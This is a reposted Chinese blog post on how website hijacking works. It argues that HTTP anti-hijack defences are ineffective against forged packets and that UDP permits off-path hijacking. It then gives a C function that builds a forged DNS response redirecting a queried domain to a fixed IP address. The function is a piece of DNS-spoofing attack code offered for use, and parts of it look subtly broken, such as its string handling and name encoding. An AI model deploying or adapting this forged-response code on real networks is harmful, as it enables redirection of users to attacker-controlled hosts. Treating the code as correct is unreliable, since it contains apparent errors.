网站劫持是怎样实现的?

  怎么可以检测网站的安全情况?
  iis7网站监控
  网站是否被劫持、DNS是否被污染、网站打开速度测试的检查。
  劫持的原理与实现,主要还是针对TCP下HTTP服务而言的,有粉儿问了二个问题,一个问题是基于TCP的HTTP服务可以防劫持吗,网上有许多关于HTTP防劫持的办法,有说检测服务地址的,有说分片传输请求的,有说检测ttl值异常的,有说禁止重定向的,结论是都没用,伪造报文里网络层地址原本就是用户的目标地址,否则还叫什么伪造呢,请求报文分片web端能识别劫持设备就能识别,况且你确定你分片的报文在网络设备层发送前不会合并吗,ttl异常检测完全不靠谱,不用重定向200OK照样让你乖乖跳转;另一个问题是UDP能实现旁路劫持控制吗,结论是可以,UDP不同于TCP无连接无状态,只要数据合法先到先得,早年运营商控制P2P数据传输对带宽的占用就使用过类似方法,直接看代码吧不复杂。
  DNS劫持
  UINT GtDnsForge(UCHAR* puszPacket, GTDNSHEADER_S* pstHead, GTDNSQUESTION_S* pstQues)
  {
  UCHAR* puszCur = puszPacket;
  /* dns header */
  memcpy(puszCur, &pstHead->m_usIdent, sizeof(USHORT));
  puszCur += sizeof(USHORT);
  *(USHORT*)puszCur = htons(0X8180);
  /**(USHORT*)puszCur |= DNS_FLAG_QR;
  *(USHORT*)puszCur |= DNS_FLAG_AA;
  *(USHORT*)puszCur |= DNS_FLAG_RD;
  *(USHORT*)puszCur |= DNS_FLAG_RA;*/
  puszCur += sizeof(USHORT);
  *(USHORT*)puszCur = pstHead->m_usQuCount;
  puszCur += sizeof(USHORT);
  *(USHORT*)puszCur = GT_DNS_AN;
  puszCur += sizeof(USHORT);
  *(USHORT*)puszCur = GT_DNS_NA;
  puszCur += sizeof(USHORT);
  *(USHORT*)puszCur = GT_DNS_AD;
  puszCur += sizeof(USHORT);
  /* dns question */
  strcat((char*)puszCur, pstQues->m_szUrl);
  puszCur += strlen(pstQues->m_szUrl) + 1;
  *(USHORT*)puszCur = pstQues->m_usType;
  puszCur += sizeof(USHORT);
  *(USHORT*)puszCur = pstQues->m_usClass;
  puszCur += sizeof(USHORT);
  /* dns answer */
  *(USHORT*)puszCur = GT_DNS_DOMAIN;
  puszCur += sizeof(USHORT);
  *(USHORT*)puszCur = GT_DNS_AN;
  puszCur += sizeof(USHORT);
  *(USHORT*)puszCur = GT_DNS_AN;
  puszCur += sizeof(USHORT);
  *(UINT*)puszCur = GT_DNS_DEFAULT_TTL;
  puszCur += sizeof(UINT);
  *(USHORT*)puszCur = GT_DNS_AN_SIZE;
  puszCur += sizeof(USHORT);
  *(UINT*)puszCur = inet_addr(GT_DNS_HTML);
  puszCur += sizeof(UINT) + 1;
  return (UINT)(puszCur - puszPacket);

转载于:https://www.cnblogs.com/goodcola/p/11505007.html

你可能感兴趣的:(网站劫持是怎样实现的?)